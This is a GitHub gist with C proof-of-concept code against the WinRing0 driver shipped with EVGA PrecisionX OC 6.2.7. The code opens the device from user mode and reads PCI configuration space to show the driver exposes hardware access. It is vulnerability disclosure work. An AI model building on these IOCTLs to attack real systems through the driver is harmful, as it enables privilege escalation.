Skip to content

Instantly share code, notes, and snippets.

@hfiref0x

hfiref0x/wr0_demo4.c

Last active October 28, 2021 07:10
Show Gist options
  • Save hfiref0x/c32990c8625347b63b252cca4f740caf to your computer and use it in GitHub Desktop.
Save hfiref0x/c32990c8625347b63b252cca4f740caf to your computer and use it in GitHub Desktop.
Download ZIP
EVGA PrecisionX OC 6.2.7 wormhole driver
Raw
wr0_demo4.c
#include <windows.h>
#include <cstdio>
#define DEVICE_WR0_TYPE 40000
#define WR0_DEVICE_LINK TEXT("\\\\.\\WinRing0_1_2_0")
HANDLE g_handleWR0 = INVALID_HANDLE_VALUE;
#define IOCTL_WR0_READ_PCI_CONFIG CTL_CODE(DEVICE_WR0_TYPE, 0x851, METHOD_BUFFERED, FILE_READ_ACCESS)
#define IOCTL_WR0_WRITE_PCI_CONFIG CTL_CODE(DEVICE_WR0_TYPE, 0x852, METHOD_BUFFERED, FILE_WRITE_ACCESS)
typedef struct _WR0_READ_PCI_CONFIG_INPUT {
ULONG PciAddress;
ULONG PciOffset;
} WR0_READ_PCI_CONFIG_INPUT, * PWR0_READ_PCI_CONFIG_INPUT;
typedef struct _WR0_WRITE_PCI_CONFIG_INPUT {
ULONG PciAddress;
ULONG PciOffset;
UCHAR Data[1];
} WR0_WRITE_PCI_CONFIG_INPUT, * PWR0_WRITE_PCI_CONFIG_INPUT;
BOOLEAN InitDriver()
{
g_handleWR0 = CreateFile(WR0_DEVICE_LINK,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
if (g_handleWR0 == INVALID_HANDLE_VALUE) {
printf_s("[!] Unable to open device\r\n");
return FALSE;
}
return TRUE;
}
BOOL ReadPciConfig(
_In_ ULONG PciAddress,
_In_ DWORD PciOffset,
_In_ PBYTE Value,
_In_ DWORD Size)
{
WR0_READ_PCI_CONFIG_INPUT request;
request.PciAddress = PciAddress;
request.PciOffset = PciOffset;
ULONG readBytes;
return DeviceIoControl(
g_handleWR0,
IOCTL_WR0_READ_PCI_CONFIG,
&request,
sizeof(request),
Value,
Size,
&readBytes,
NULL);
}
#define REGISTER_VENDORID 0x00
#define PciBusDevFunc(Bus, Dev, Func) ((Bus & 0xFF) << 8) | ((Dev & 0x1F) << 3) | (Func & 7)
DWORD FindPciDeviceByClass(BYTE baseClass, BYTE subClass, BYTE programIf, BYTE index)
{
DWORD bus = 0, dev = 0, func = 0;
DWORD count = 0;
DWORD pciAddress = 0xFFFFFFFF;
DWORD conf[3] = { 0 };
DWORD error = 0;
BOOLEAN multiFuncFlag = FALSE;
BYTE type = 0;
count = 0;
for (bus = 0; bus <= 255; bus++)
{
for (dev = 0; dev < 31; dev++)
{
multiFuncFlag = FALSE;
for (func = 0; func < 7; func++)
{
if (multiFuncFlag == FALSE && func > 0)
{
break;
}
pciAddress = PciBusDevFunc(bus, dev, func);
if (ReadPciConfig(pciAddress, 0, (BYTE*)conf, sizeof(conf)))
{
if (func == 0)
{
if (ReadPciConfig(pciAddress, 0x0E, (BYTE*)&type, sizeof(type)))
{
if (type & 0x80)
{
multiFuncFlag = TRUE;
}
}
}
if ((conf[2] & 0xFFFFFF00) ==
(((DWORD)baseClass << 24) |
((DWORD)subClass << 16) |
((DWORD)programIf << 8))
)
{
if (count == index)
{
return pciAddress;
}
count++;
continue;
}
}
}
}
}
return 0xFFFFFFFF;
}
typedef struct _PCI_CONFIG {
WORD VendorId;
WORD DeviceId;
} PCI_CONFIG;
#define DEVICE_CLASS_DISPLAY_CONTROLLER 0x03
int Demo4()
{
printf_s("EVGA PrecisionX OC 6.2.7 PCI config read demo\r\n");
ULONG pciAddress = FindPciDeviceByClass(DEVICE_CLASS_DISPLAY_CONTROLLER, 0, 0, 0);
PCI_CONFIG pciCfg;
RtlZeroMemory(&pciCfg, sizeof(pciCfg));
ReadPciConfig(pciAddress,
REGISTER_VENDORID,
(BYTE*)&pciCfg,
sizeof(pciCfg));
printf_s("GPU VendorId/DeviceId %lX : %lX\r\n", pciCfg.VendorId, pciCfg.DeviceId);
CloseHandle(g_handleWR0);
return 0;
}
int main()
{
if (!InitDriver())
return -1;
return Demo4();
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment